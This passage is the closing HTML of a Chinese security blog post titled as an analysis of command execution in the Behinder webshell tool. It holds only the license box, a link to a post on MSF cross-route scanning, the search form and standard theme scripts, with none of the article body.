        <a href="/tags/%E5%88%86%E6%9E%90/">#分析</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>冰蝎命令执行分析</div>
      <div>https://zylx77.github.io/2022/07/05/bing-he-ming-ling-zhi-xing-fen-xi/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Gnguyd</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年7月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/05/27/msf-kua-lu-you-sao-miao/" title="MSF跨路由扫描">
                        <span class="hidden-mobile">MSF跨路由扫描</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://zylx77.github.io" target="_blank" rel="nofollow noopener"><span>Zylx77</span></a> <i class="iconfont icon-love"></i> <a href="https://zylx77.github.io" target="_blank" rel="nofollow noopener"><span>Blog</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
